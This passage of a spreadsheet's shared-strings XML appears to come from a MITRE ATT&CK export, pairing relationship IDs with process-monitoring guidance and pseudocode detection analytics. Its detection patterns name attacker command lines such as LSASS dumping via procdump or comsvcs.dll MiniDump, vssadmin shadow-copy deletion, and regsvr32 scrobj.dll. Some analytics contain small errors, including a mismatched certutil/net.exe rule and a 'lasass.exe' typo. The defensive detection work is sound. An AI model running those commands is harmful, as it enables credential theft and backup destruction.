&lt;code&gt;processes = filter processes where ((event_id="10" OR event_id="4688") AND
 (exe == "net.exe" OR exe == "net1.exe") AND command_line="*group*/domain*")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--d802c2ab-4fc1-45ba-832a-1d7852d2934d</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.</t>
  </si>
  <si>
    <t>relationship--239d8c50-7378-4c8c-9091-9ed95fae3f3b</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging.</t>
  </si>
  <si>
    <t>relationship--9764e270-8c29-47c1-90c2-31f7d57a17c6</t>
  </si>
  <si>
    <t>relationship--5344a6a5-2178-4e28-9582-393c3a17f05c</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Unusual Child Process spawned using DDE exploit&lt;/h4&gt;
&lt;code&gt; target_processes = filter processes where (
     (parent_image="*excel.exe" OR parent_image="*word.exe" OR parent_image="*outlook.exe")
     AND image="*.exe") &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--22907af2-9859-4a41-bcb4-0eaf2bb6993b</t>
  </si>
  <si>
    <t>Monitor for newly executed processes for unusual activity (e.g., a process that does not use the network begins to do so).</t>
  </si>
  <si>
    <t>relationship--7275dbe0-1dac-4355-b040-796b85d1aa89</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</si>
  <si>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</si>
  <si>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relationship--1c5b0ac8-43bb-4e04-812a-e3518755f84e</t>
  </si>
  <si>
    <t>Monitor for newly executed processes, such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001) , with arguments that can be used to enumerate email addresses and accounts.</t>
  </si>
  <si>
    <t>relationship--33845950-b1b5-41a7-8d05-58e3c2ba0730</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond).</t>
  </si>
  <si>
    <t>relationship--cf1d7257-5831-4468-9d60-06da0a7e3c93</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</si>
  <si>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</si>
  <si>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relationship--4be47566-ae2c-49cd-bde4-db506762728a</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for process activity (such as unexpected processes spawning outside a container and/or on a host) that might indicate an attempt to escape from a privileged container to host. </t>
  </si>
  <si>
    <t>relationship--11f5ed28-a9dc-4dd0-91ea-8f5df726ce56</t>
  </si>
  <si>
    <t>Tools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.</t>
  </si>
  <si>
    <t>relationship--f6eaee5b-16b6-4e9f-8dd9-41b64c38aab1</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed processes to match an existing service executables. </t>
  </si>
  <si>
    <t>relationship--cfd96c56-d86a-4421-a9e0-6116ac941caf</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</si>
  <si>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</si>
  <si>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relationship--6cb50446-4ff7-49b7-a0e3-a7a9e7a1aaf0</t>
  </si>
  <si>
    <t>Monitor for newly executed processes when removable media is mounted.</t>
  </si>
  <si>
    <t>relationship--c8da839f-31cf-42f7-ae75-2df96c44cf31</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly executed processes when removable media is mounted </t>
  </si>
  <si>
    <t>relationship--48f4cf50-8010-455e-bfe4-f749fcb9a3ac</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</si>
  <si>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</si>
  <si>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relationship--48035d76-c565-41cd-bb47-8e2a98421e14</t>
  </si>
  <si>
    <t>Monitor for abnormal process creations, such as a Command and Scripting Interpreter spawning from a potentially exploited application. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes.</t>
  </si>
  <si>
    <t>relationship--70c9262b-0a90-4c78-ba50-b968aa056246</t>
  </si>
  <si>
    <t>relationship--64556727-5528-4503-bf45-f951933c8758</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may exploit software vulnerabilities in an attempt to elevate privileges.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&lt;h4&gt; Analytic 1 - Unusual Child Process for spoolsv.exe or connhost.exe &lt;/h4&gt;
&lt;code&gt; processes = filter processes where (
  (event_id == "1" OR event_id == "4688") AND
  (exe =="C:\Windows\System32\spoolsv.exe" OR 
   exe =="C:\Windows\System32\conhost.exe") AND
   parent_image_path == "C:\Windows\System32\cmd.exe")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--9330e368-a876-43a2-9e8a-ea4e37f00b85</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.</t>
  </si>
  <si>
    <t>relationship--dd582e36-081c-4bc7-ab2a-cc859c7930bc</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018)</t>
  </si>
  <si>
    <t>relationship--5842b656-f3d7-43f6-a6c5-7bdf238182a3</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly executed processes </t>
  </si>
  <si>
    <t>relationship--d034608f-da90-4248-ba3b-848e93805115</t>
  </si>
  <si>
    <t>relationship--1dc28189-0852-4ded-a69c-a00e69d0c6f1</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</si>
  <si>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</si>
  <si>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relationship--6b4f280e-cf3b-4644-adc7-c2792c3b1fa8</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may set files and directories to be hidden to evade detection mechanisms.</t>
  </si>
  <si>
    <t>relationship--00c61f2d-f55e-4257-b92c-682352feb37d</t>
  </si>
  <si>
    <t>Monitor newly executed processes for actions that could be taken to add a new user and subsequently hide it from login screens.</t>
  </si>
  <si>
    <t>relationship--7b1e92ce-ca77-4401-a79b-774b5694b8c6</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may use hidden windows to conceal malicious activity from the plain sight of users.</t>
  </si>
  <si>
    <t>relationship--5481052b-e356-4cb4-873d-1822eef5930a</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>relationship--6d45b87e-0cc4-40a7-96cf-f9f654de8065</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</si>
  <si>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</si>
  <si>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relationship--69db3e09-9dd7-41b9-b2a9-1b9aa27a6ade</t>
  </si>
  <si>
    <t>Monitor newly created processes for artifacts, such as `nohup` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) `-ErrorAction SilentlyContinue`, that may attempt to hide processes from interrupt signals.</t>
  </si>
  <si>
    <t>relationship--787fd846-e0de-4e86-b7b1-1725058335f5</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</si>
  <si>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</si>
  <si>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relationship--d4b7fe3d-aab5-48fe-b3bc-123f5bd90712</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.</t>
  </si>
  <si>
    <t>relationship--e09816fa-78e1-439e-8b57-dfcb9f08a3fb</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t>relationship--bfbb010f-b4b9-4df9-b591-ef13c14ecafb</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines that can be used instead of invoking cmd (i.e. pcalua.exe, winrs.exe, cscript/wscript.exe, hh.exe, or bash.exe)</t>
  </si>
  <si>
    <t>relationship--a15c905a-4932-48d8-aed0-362c0e465efd</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Detecting Shadow Copy Deletion or Resize&lt;/h4&gt; 
&lt;code&gt;deleted_copy = filter processes where ((event_id ="4688" OR event_id ="1") (CommandLine="*vssadmin* *delete* *shadows*" OR CommandLine="*wmic* *shadowcopy* *delete*" OR CommandLine="*vssadmin* *resize* *shadowstorage*")) OR (event_id ="5857" ProviderName="MSVSS__PROVIDER") OR (event_id ="5858" Operation="*Win32_ShadowCopy*")&lt;/code&gt;
&lt;h4&gt;Analytic 2 - BCDEdit Failure Recovery Modification&lt;/h4&gt; 
&lt;code&gt;bcdedit_commands = filter processes where (
  exe = "C:\Windows\System32\bcdedit.exe" AND command_line="*recoveryenabled*" )&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--019abb1f-efcb-4828-9805-4b5a7191170c</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly executed processes conducting malicious activity </t>
  </si>
  <si>
    <t>relationship--1b207904-5be1-4bd8-8f08-a9b31bddc4c8</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Attempt to Add Certificate to Untrusted Store&lt;/h4&gt;
&lt;code&gt; addstore_commands = filter processes where (
  exe =”C:\Windows\System32\certutil.exe” AND command_line="*-addstore*” )&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--42816956-5a66-4a94-99a2-dd21bfc126e2</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity</t>
  </si>
  <si>
    <t>relationship--b462ba3d-65a4-4565-be36-94d3169b993f</t>
  </si>
  <si>
    <t>Monitor processes with arguments that may be related to abuse of installer packages, including malicious, likely elevated processes triggered by application installations.</t>
  </si>
  <si>
    <t>relationship--a88d4d4f-d10c-46b4-b89d-c26a465f8338</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that are associated with abuse of IPC mechanisms</t>
  </si>
  <si>
    <t>relationship--1d8d3beb-eb0c-4c5d-b813-913e790fc773</t>
  </si>
  <si>
    <t>Monitor for executed processes (such as tracert or ping) that may check for Internet connectivity on compromised systems.</t>
  </si>
  <si>
    <t>relationship--1f6a3d3b-11da-4c68-9f46-732ad54f4869</t>
  </si>
  <si>
    <t>Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts</t>
  </si>
  <si>
    <t>relationship--77945b82-ac46-4ac0-a0e7-2ded2f490aaa</t>
  </si>
  <si>
    <t>Monitor for newly created processes that may modify the kernel to automatically execute programs on system boot.</t>
  </si>
  <si>
    <t>relationship--bb06a641-7b0f-4c42-bfcb-942f8cc7e666</t>
  </si>
  <si>
    <t>Monitor processes spawned by command line utilities to manipulate keychains directly, such as &lt;code&gt;security&lt;/code&gt;, combined with arguments to collect passwords, such as &lt;code&gt;dump-keychain -d&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--79e99ff9-f39b-411f-86ba-0b46a3afe7dc</t>
  </si>
  <si>
    <t>Monitor processes for those that may be used to modify binary headers.</t>
  </si>
  <si>
    <t>relationship--74101766-40b3-45d7-846f-4c10932b67ec</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Procdump&lt;/h4&gt;
&lt;code&gt; processes = filter processes where ((event_id == "1" OR event_id == "4688") AND exe == "procdump*.exe" and command_line == "*lsass*")&lt;/code&gt;
&lt;h4&gt;Analytic 2 - MiniDump via rundll32&lt;/h4&gt;
&lt;code&gt; processes = filter processes where ((event_id == "1" OR event_id == "4688") AND exe == "*rundll32.exe" and command_line == "*comsvcs.dll MiniDump*")&lt;/code&gt;
</t>
  </si>
  <si>
    <t>relationship--6495caa4-0de9-43ae-b19d-68dc846c16cc</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor newly constructed processes that assist in lateral tool transfers. </t>
  </si>
  <si>
    <t>relationship--dd86550a-6b4d-4385-bf80-404bfe8cb038</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may create or modify Launch Daemons to execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>relationship--4c1df23b-5238-43ec-8f31-3c9a07d11ff5</t>
  </si>
  <si>
    <t>Monitor for newly executed daemons that may abuse launchctl to execute commands or programs.</t>
  </si>
  <si>
    <t>relationship--128620b6-fea5-497b-a914-d9c3f8481497</t>
  </si>
  <si>
    <t>relationship--0e39ec08-1dc8-4152-9d21-dafb8df34f2c</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Net Discovery Commands &lt;/h4&gt;
&lt;code&gt;processes = filter processes where ((event_id="10" OR event_id="4688") AND
 exe == "net.exe" OR exe == "net1.exe")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--738e6cb3-3a0d-4490-a254-a7c161f92989</t>
  </si>
  <si>
    <t>Monitor newly executed processes associated with account creation, such as net.exe
&lt;h4&gt;Analytic 1 - Create local admin accounts using net.exe &lt;/h4&gt;
&lt;code&gt;certutil_downloads = filter processes where (
  (exe = C:\Windows\System32\net.exe OR exe = C:\Windows\System32\net1.exe ) AND command_line = * -exportPFX * )&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--88f2b6ee-50d5-410c-8428-581ea948748c</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</si>
  <si>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&lt;h4&gt; Analytic 1 - Suspicious Processes &lt;/h4&gt;
&lt;code&gt;processes = filter processes where (
 (event_id == "1" OR event_id == "4688") AND
  exe = "net.exe" AND (
  command_line="*net* user*" OR
  command_line="*net* group*" OR
  command_line="*net* localgroup*" OR
  command_line="*get-localgroup*" OR
  command_line="*get-ADPrincipalGroupMembership*" )&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--9deaa56a-7d34-4814-acc4-cf78c10bd84c</t>
  </si>
  <si>
    <t>Monitor for unexpected process activity associated with utilities that can access and export logs, such as `wevutil.exe` on Windows and `CollectGuestLogs.exe` on Azure hosted VMs.</t>
  </si>
  <si>
    <t>relationship--dc6119c4-8330-457c-9cf3-c90ac6e42221</t>
  </si>
  <si>
    <t>Monitor for processes and/or command-lines to install or modify login hooks, as well as processes spawned at user login by these hooks.</t>
  </si>
  <si>
    <t>relationship--51a4c7b0-608a-415b-b59d-87d2b81371e7</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</si>
  <si>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</si>
  <si>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relationship--0932a662-4bd8-4b8b-883a-480272280a18</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines that execute logon scripts</t>
  </si>
  <si>
    <t>relationship--e6965732-e5a0-4d13-8c50-efb8236e483d</t>
  </si>
  <si>
    <t>Monitor processes for suspicious or malicious use of MMC. Since MMC is a signed Windows binary, verify use of MMC is legitimate and not malicious.</t>
  </si>
  <si>
    <t>relationship--f6e9b528-8e46-4ac3-85ff-f9be29aa9c3f</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</si>
  <si>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&lt;h4&gt;Analytic 1 - MSBuild and msxsl&lt;/h4&gt;
&lt;code&gt;target_processes = filter processes where (
  (exe="C:\Program Files (x86)\Microsoft Visual Studio\*\bin\MSBuild.exe" OR exe="C:\Windows\Microsoft.NET\Framework*\msbuild.exe" OR exe="C:\users\*\appdata\roaming\microsoft\msxsl.exe") AND
  image_path!="*Microsoft Visual Studio*")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--d617a381-4428-4132-8a13-3f017920c11b</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</si>
  <si>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</si>
  <si>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relationship--8eda78b8-3fd5-4c97-878d-bf2eaa0aa9b5</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Suspicious Run Locations &lt;/h4&gt;
&lt;code&gt;suspicious_locations = filter process where (
 image_path == "*:\RECYCLER\*" or
 image_path == "*:\SystemVolumeInformation\*" or
 image_path == "%windir%\Tasks\*" or
 image_path == "%systemroot%\debug\*")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--911716a6-6c59-4055-a74b-9152b19800cb</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Common Windows Process Masquerading &lt;/h4&gt;
&lt;code&gt;suspicious_processes = filter processes where (
  (exe=svchost.exe AND (image_path!="C:\\Windows\\System32\\svchost.exe" OR process_path!="C:\\Windows\\SysWow64\\svchost.exe"))
  OR (exe=smss.exe AND image_path!="C:\\Windows\\System32\\smss.exe")
  OR (exe=wininit.exe AND image_path!="C:\\Windows\\System32\\wininit.exe")
  OR (exe=taskhost.exe AND image_path!="C:\\Windows\\System32\\taskhost.exe")
  OR (exe=lasass.exe AND image_path!="C:\\Windows\\System32\\lsass.exe")
  OR (exe=winlogon.exe AND image_path!="C:\\Windows\\System32\\winlogon.exe")
  OR (exe=csrss.exe AND image_path!="C:\\Windows\\System32\\csrss.exe")
  OR (exe=services.exe AND image_path!="C:\\Windows\\System32\\services.exe")
  OR (exe=lsm.exe AND image_path!="C:\\Windows\\System32\\lsm.exe")
  OR (exe=explorer.exe AND image_path!="C:\\Windows\\explorer.exe"))&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--70c5c2c4-9971-42d8-a94a-8b46ffec3a80</t>
  </si>
  <si>
    <t>Monitor the execution and arguments of mavinject.exe. Compare recent invocations of mavinject.exe with prior history of known good arguments and injected DLLs to determine anomalous and potentially adversarial activity.</t>
  </si>
  <si>
    <t>relationship--e97a4938-63d3-4b3d-8b55-fb1ac55de96b</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</si>
  <si>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&lt;h4&gt; Analytic 1 - Suspicious Processes &lt;/h4&gt;
&lt;code&gt;reg_processes = filter processes where ( 
  (event_id == "1" OR event_id == "4688") AND (exe == "reg.exe" AND parent_exe == "cmd.exe"))
cmd_processes = filter processes where ( 
  (event_id == "1" OR event_id == "4688") AND (exe == "cmd.exe" AND parent_exe != "explorer.exe""))
reg_and_cmd_processes = join (reg_processes, cmd_processes) where (reg.parent_pid == cmd.pid and reg.hostname == cmd.hostname)&lt;/code&gt;
&lt;h4&gt;Analytic 2 - Rare LolBAS Command Lines &lt;/h4&gt;
&lt;code&gt;lolbas_processes = filter processes where (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 &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--a6bc65f9-30c8-4f55-b4ce-049afdb3255b</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of mshta.exe.</t>
  </si>
  <si>
    <t>relationship--5b3ab1c3-e885-40d8-9c5e-7f9c18c62ee7</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files.</t>
  </si>
  <si>
    <t>relationship--c9c6986b-e954-4821-b271-f22d50f2284f</t>
  </si>
  <si>
    <t>It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior.</t>
  </si>
  <si>
    <t>relationship--ddbd80ff-1319-4c9e-ad3c-93091b12a577</t>
  </si>
  <si>
    <t>relationship--b6a22f6c-e7a4-499e-9732-afb37a4e5254</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</si>
  <si>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&lt;h4&gt; Analytic 1: Network Share Connection Removal &lt;/h4&gt;
&lt;code&gt; target_processes = filter processes where (
  (event_id == "1" OR event_id == "4688") AND 
  (exe == "C:\Windows\System32\net.exe" AND command_line == "*delete*") OR
  command_line="*Remove-SmbShare*" OR
  command_line="*Remove-FileShare*" )&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--9010a311-e581-428a-ba67-cf4b31891803</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.</t>
  </si>
  <si>
    <t>relationship--d71e8cf0-c181-46d8-b152-3ea2d4d218d6</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Windows&lt;/h4&gt;
&lt;code&gt;processes = filter processes where (
(event_id == "1" OR event_id == "4688") AND
exe == "tshark.exe" OR
exe == "windump.exe" OR
(exe == "logman.exe" AND parent_exe exists AND parent_exe!="C:\Program Files\Windows Event Reporting\Core\EventReporting.AgentService.exe") OR
exe == "tcpdump.exe" OR
exe == "wprui.exe" OR
exe == "wpr.exe" ) &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--bff0eec0-8b94-44fc-95c5-6819b67f150c</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may be indicative of credential dumping. On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.</t>
  </si>
  <si>
    <t>relationship--2a25ebc1-6c8e-4fd6-8ce1-339f0de199f0</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.</t>
  </si>
  <si>
    <t>relationship--f529dc66-7087-4a41-9baa-98ef9e60296f</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.</t>
  </si>
  <si>
    <t>relationship--6a5f874b-9297-4c61-9cb1-85012b52c20b</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</si>
  <si>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</si>
  <si>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relationship--b4447988-d4a6-4a6d-b2d0-802869a6006a</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may abuse Microsoft Office templates to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>relationship--a714680b-edab-459c-bb8f-cc313cfc4372</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>relationship--dce314c1-0f13-4b6e-8732-607357cc9668</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may abuse Microsoft Outlook forms to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>relationship--f583ac96-aee9-4a06-ba38-b370a615fe2d</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>relationship--c121f791-981e-46c8-a04d-5edadb8521c8</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may abuse Microsoft Outlook rules to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>relationship--206c3b88-3649-47ae-ae0d-66ceaf91186e</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</si>
  <si>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</si>
  <si>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relationship--2f8b5f21-4145-45a9-aec5-04ef9d99e2e7</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may attempt to access detailed information about the password policy used within an enterprise network or cloud environment.</t>
  </si>
  <si>
    <t>relationship--a5565e9f-47fa-41d3-9e15-608b3844fc8d</t>
  </si>
  <si>
    <t>Monitor for newly executed processes for process executable paths that are named for partial directories.</t>
  </si>
  <si>
    <t>relationship--e805835f-7d20-461e-9b2a-8b039f8cabc6</t>
  </si>
  <si>
    <t>Monitor for newly executed processes  for process executable paths that are named for partial directories.</t>
  </si>
  <si>
    <t>relationship--1f740889-9bfb-4911-91ff-0d8267a7eeb0</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may execute their own malicious payloads by hijacking vulnerable file path references.</t>
  </si>
  <si>
    <t>relationship--e93adad0-cfbb-4ef8-bb56-68dc46d8b568</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may attempt to gather information about attached peripheral devices and components connected to a computer system.</t>
  </si>
  <si>
    <t>relationship--874d3e3b-bf8e-454e-afdb-7986b6c0edc4</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</si>
  <si>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</si>
  <si>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relationship--0a06686e-b4f4-4f1b-a4b2-b473e706f658</t>
  </si>
  <si>
    <t>Monitor for newly executed processes with arguments that can modify property list (plist) files.</t>
  </si>
  <si>
    <t>relationship--9684566a-f435-4d5e-a4c0-51c6119eb6fa</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may abuse PowerShell commands and scripts for execution.
Note: Event IDs are for Sysmon (Event ID 10 - process access) and Windows Security Log (Event ID 4688 - a new process has been created).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&lt;h4&gt;Analytic 1- Non-interactive Powershell Sessions&lt;/h4&gt;
&lt;code&gt;processes = filter process where ((event_id="10" OR event_id="4688") AND exe == "powershell.exe" AND parent_exe != "explorer.exe")&lt;/code&gt;
&lt;h4&gt;Analytic 2- Remote Powershell Sessions&lt;/h4&gt;
&lt;code&gt;processes = filter process where ((event_id="10" OR event_id="4688") AND exe == "wsmprovhost.exe" and parent_exe == "svchost.exe")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--440aeea8-97bc-4b65-be16-7f411b747798</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.</t>
  </si>
  <si>
    <t>relationship--d63bec5d-c2b9-4057-bd3f-30c5bc1b5bd8</t>
  </si>
  <si>
    <t>attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1</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</si>
  <si>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</si>
  <si>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relationship--4cc39e53-3498-4ecc-a316-603f3a47dbf6</t>
  </si>
  <si>
    <t>06 May 2022</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</si>
  <si>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dsquery is only pre-existing on Windows servers.
&lt;h4&gt;Analytic 1 - Host Discovery Commands &lt;/h4&gt;
&lt;code&gt;info_command = filter process where (
 exe == "hostname.exe" or
 exe == "ipconfig.exe" or
 exe == "net.exe" or
 exe == "quser.exe" or
 exe == "qwinsta.exe" or
 exe == "sc" and (command_line match " query" or command_line match " qc")) or
 exe == "systeminfo.exe" or
 exe == "tasklist.exe" or
 exe == "whoami.exe")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--065f628f-4539-4543-b922-ec3b6fd25a70</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Processes Started From Irregular Parents&lt;/h4&gt;
&lt;code&gt;mismatch_processes = filter processes where ( parent_exe exists AND
  (exe="smss.exe" AND (parent_exe!="smss.exe" AND parent_exe!="System") OR
  (exe="csrss.exe" AND (parent_exe!="smss.exe" AND parent_exe!="svchost.exe")) OR
  (exe="wininit.exe" AND parent_exe!="smss.exe") OR
  (exe="winlogon.exe" AND parent_exe!="smss.exe") OR
  (exe="lsass.exe" AND (parent_exe!="wininit.exe" AND parent_exe!="winlogon.exe")) OR
  (exe="LogonUI.exe" AND (parent_exe!="winlogon.exe" AND parent_exe!="wininit.exe")) OR
  (exe="services.exe" AND parent_exe!="wininit.exe") OR
  (exe="spoolsv.exe" AND parent_exe!="services.exe") OR
  (exe="taskhost.exe" AND (parent_exe!="services.exe" AND parent_exe!="svchost.exe")) OR
  (exe="taskhostw.exe" AND (parent_exe!="services.exe" AND parent_exe!="svchost.exe")) OR
  (exe="userinit.exe" AND (parent_exe!="dwm.exe" AND parent_exe!="winlogon.exe"))&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--57ce9ed8-5acb-4acf-8a66-39b9ab829273</t>
  </si>
  <si>
    <t>Monitor script processes, such as `cscript that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
    <t>relationship--533036d1-d0db-4bb1-b14c-eee83261fc66</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</si>
  <si>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</si>
  <si>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relationship--cd302f73-dd1d-484e-bd96-ed8379f52c39</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</si>
  <si>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&lt;h4&gt; Analytic 1 - Suspicious Processes with Registry keys &lt;/h4&gt;
&lt;code&gt;suspicious_processes = filter processes where (EventId == "1" OR EventId == "4688") AND((ProcessCommandLine LIKE '%reg%' AND ProcessCommandLine LIKE '%query%') OR (ProcessCommandLine LIKE '%Registry%' AND (ProcessCommandLine LIKE '%HKEY_CLASSES_ROOT%' OR ProcessCommandLine '%HKCR%'))) &lt;/code&gt;
&lt;h4&gt; Analytic 2 - reg.exe spawned from suspicious cmd.exe &lt;/h4&gt;
&lt;code&gt;reg_processes = filter processes where (EventId == "1" OR EventId == "4688") AND (ProcessFilePath LIKE '%reg.exe%' AND ProcessParentFilePath LIKE '%cmd.exe%')
cmd_processes = filter command_line where (event_id == "1" OR event_id == "4688") AND (ProcessFilePath LIKE '%cmd.exe%' AND ProcessParentFilePath NOT LIKE '%explorer.exe%') 
suspicious_processes = 
SELECT r.ProcessGuid, r.ProcessFilePath, c.ProcessFilePath AS ProcessParentFilePath
FROM reg_processes r
INNER JOIN cmd_processes c
ON r.ProcessParentGuid = c.ProcessGuid &lt;/code&gt;
&lt;h4&gt;Analytic 3 - Rare LolBAS command lines&lt;/h4&gt;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t>
  </si>
  <si>
    <t>relationship--ccdafe5f-5bad-4929-8767-739c3f48b9c1</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines that  execute /etc/rc.local if present.</t>
  </si>
  <si>
    <t>relationship--3414a5c1-2376-4477-9bb6-c324e8dabaec</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</si>
  <si>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</si>
  <si>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relationship--6ec7a597-0364-4a05-8174-8f7f094bbeff</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Reg.exe called from Command Shell &lt;/h4&gt;
&lt;code&gt;reg = filter processes where (exe == "reg.exe" and parent_exe == "cmd.exe")
cmd = filter processes where (exe == "cmd.exe" and parent_exe != "explorer.exe"")
reg_and_cmd = join (reg, cmd) where (reg.ppid == cmd.pid and reg.hostname == cmd.hostname)&lt;/code&gt;
&lt;h4&gt;Analytic 2 - Rare LolBAS Command Lines&lt;/h4&gt;
&lt;code&gt;lolbas_processes = filter processes where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lower_bound)&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--a72eb24f-256b-4d88-a839-55d1d35833bb</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</si>
  <si>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</si>
  <si>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relationship--a582e4e0-8fdd-4bc6-8cb4-197d3fc3a42c</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</si>
  <si>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&lt;h4&gt; Analytic 1 - Generic Regsvr32 &lt;/h4&gt;
&lt;code&gt; processes = filter processes where (
  (event_id == "1" OR event_id == "4688") AND
  parent_image_path == "*regsvr32.exe" and exe != "*regsvr32.exe*")&lt;/code&gt;
&lt;h4&gt;Analytic 2 - Squiblydoo&lt;/h4&gt;
&lt;code&gt;processes = filter process where (
  (event_id == "1" OR event_id == "4688") AND
  (process_path == "*regsvr32.exe" and command_line == "*scrobj.dll"))&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--fb89c2ae-56f0-4084-bb28-de915c70ddc4</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</si>
  <si>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</si>
  <si>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relationship--7744eff7-6f61-4e1d-a3be-069a417a9ff6</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</si>
  <si>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</si>
  <si>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relationship--6b307e36-0d55-43af-864d-095fb78dd711</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may take control of preexisting sessions with remote services to move laterally in an environment.</t>
  </si>
  <si>
    <t>relationship--855bbd91-c7b6-405c-9d7c-881a04e79b6f</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</si>
  <si>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</si>
  <si>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relationship--fdcd0f65-a087-453a-8f9f-ab8db0764492</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that can be used to discover remote systems, such as &lt;code&gt;ping.exe&lt;/code&gt; and &lt;code&gt;tracert.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)</t>
